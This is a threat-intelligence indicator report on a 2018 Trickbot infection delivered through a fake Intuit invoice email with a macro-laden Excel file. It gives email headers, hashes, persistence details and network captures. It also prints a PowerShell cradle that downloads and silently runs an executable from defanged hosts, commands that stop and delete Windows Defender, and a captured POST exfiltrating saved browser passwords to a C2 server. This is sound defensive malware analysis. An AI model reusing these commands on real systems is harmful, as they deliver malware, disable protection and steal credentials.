
#trickbot_240918

VRad, Sep 24th, 2018
#IOC #OptiData #VR #Trickbot #X97M #macro

https://myonlinesecurity.co.uk/trickbot-delivered-via-fake-intuit-fw-invoice-3989021-email/

email_headers
--------------
Received: from intuit-invoice.co.uk (hosted-by.leaseweb.com [5.79.78.24] (may be forged))
    by mailsrv1.victim.com (8.15.2/8.15.2) with ESMTP id w8OBMBKB095862
    for <user1@mev.victim.com>; Mon, 24 Sep 2018 14:22:11 +0300 (EEST)
    (envelope-from J.Monta-user1=mev.victim.com@intuit-invoice.co.uk)
Received: by intuit-invoice.co.uk id hl34cda5qi05 for <user1@mev.victim.com>;
Mon, 24 Sep 2018 07:07:32 -0400 (envelope-from <J.Monta-user1=mev.victim.com@intuit-invoice.co.uk>)
Subject:  FW: Invoice #3989021
From: "Intuit Invoice" <J.Monta@intuit-invoice.co.uk>

files
--------------

SHA-256 b24f811c6f7a930e78d3769c39f95d899b089ac4b805f3654b37922b41c6a233
File name   Invoice3989021.xls
File size   56.5 KB

SHA-256 f1fca2ff7712a60158068b151b5ebf0c73826b50cb8be136fc17ba8c7c2d0107
File name   Client dll for Pim Index Maintenance
File size   361 KB

h11p: \eaucardinal{.} com/perfo.rmance
h11p: \abogadodetexas{.} com/perfo.rmance

activity
-------------

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
cmd /c powershell "'powershell ""function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,''%tmp%\very.exe'');start-process ''%tmp%\very.exe'';}try{iter(''http://eaucardinal{.} com/perfo.rmance'')}catch{iter(''http://abogadodetexas{.} com/perfo.rmance'')}'"" | out-file -encoding ascii -filepath %tmp%\parser.bat; start-process '%tmp%\parser.bat' -windowstyle hidden"
powershell  "'powershell ""function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,''C:\tmp\very.exe'');start-process ''C:\tmp\very.exe'';}try{iter(''http://eaucardinal{.} com/perfo.rmance'')}catch{iter(''http://abogadodetexas{.} com/perfo.rmance'')}'"" | out-file -encoding ascii -filepath C:\tmp\parser.bat; start-process 'C:\tmp\parser.bat' -windowstyle hidden"
cmd /c ""C:\tmp\parser.bat" "
powershell  "function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,'C:\tmp\very.exe');start-process 'C:\tmp\very.exe';}try{iter('http://eaucardinal{.} com/perfo.rmance')}catch{iter('http://abogadodetexas{.} com/perfo.rmance')}
"C:\tmp\very.exe"
C:\Windows\SysWOW64\cmd.exe
sc  stop WinDefend
sc  delete WinDefend
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
powershell  Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\operator\AppData\Roaming\AIMT\vesy.exe
C:\Windows\SysWOW64\cmd.exe
sc  stop WinDefend
sc  delete WinDefend
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe
svchost.exe
svchost.exe
:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\taskeng.exe {6A47CA07-7739-4626-8919-0200D91B9F0B} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
C:\Users\operator\AppData\Roaming\AIMT\vesy.exe
C:\Windows\SysWOW64\cmd.exe
/c sc stop WinDefend
sc  delete WinDefend
C:\Windows\SysWOW64\cmd.exe
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe

persist
--------------
\Msntcs Client dll for Pim Index Maintenance
Client dll for Pim Index Maintenance
c:\users\operator\appdata\roaming\aimt\vesy.exe 24.09.2018 11:16

netwrk
--------------
198.50.100.170  eaucardinal{.} com  GET /perfo.rmance HTTP/1.1      301
198.50.100.170  www.eaucardinal{.} com  GET /perfo.rmance HTTP/1.1  404
23.229.233.135  abogadodetexas{.} com   GET /perfo.rmance HTTP/1.1  200     !This program cannot be run in DOS mode.

52.1.46.34  checkip.amazonaws.com   GET / HTTP/1.1  Mozilla/5.0 (Windows NT 10.0; Win64; x64)   200 Public IP

138.34.45.133   138.34.45.133   POST /ser0924/APM11_W617601.id/81/ HTTP/1.1     Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
138.34.45.133   138.34.45.133   POST /ser0924/APM11_W617601.id/81/ HTTP/1.1     Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;

POST /ser0924/APM11_W617601.id/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0
Host: 138.34.45.133

-----------NZYIBXEQQVBQBMZW
Content-Disposition: form-data; name="data"

http://www.i.ua|oper|********(saved passwd)
https://www.ukr.net|11oper|********(saved passwd)
https://accounts.google.com|oper11.wdma@gmail.com|********(saved passwd)
https://login.live.com|oper11.wdma@gmail.com|********(saved passwd)

-----------NZYIBXEQQVBQBMZW
Content-Disposition: form-data; name="source"

firefox passwords
-----------NZYIBXEQ

powershell.exe  2336    TCP 10.0.2.15   49693   198.50.100.170  80  ESTABLISHED
powershell.exe  2336    TCP 10.0.2.15   49694   198.50.100.170  80  ESTABLISHED
powershell.exe  2336    TCP 10.0.2.15   49695   23.229.233.135  80  ESTABLISHED

svchost.exe 2540    TCP 10.0.2.15   49696   216.239.32.21   80  ESTABLISHED
svchost.exe 2540    TCP 10.0.2.15   49697   216.239.32.21   443 ESTABLISHED
svchost.exe 2540    TCP 10.0.2.15   49698   107.181.174.176 443 SYN_SENT

svchost.exe 2540    TCP apm11   49696   any-in-2015.1e100.net   http    ESTABLISHED
svchost.exe 2540    TCP apm11   49697   any-in-2015.1e100.net   https   ESTABLISHED
svchost.exe 2540    TCP apm11   49699   vds5605.example.com https   SYN_SENT

# # #
https://www.virustotal.com/#/file/b24f811c6f7a930e78d3769c39f95d899b089ac4b805f3654b37922b41c6a233/community
https://www.virustotal.com/#/file/f1fca2ff7712a60158068b151b5ebf0c73826b50cb8be136fc17ba8c7c2d0107/community
https://analyze.intezer.com/#/analyses/7b1c2c08-1538-4aa1-a0b4-c4a66c7dbcc9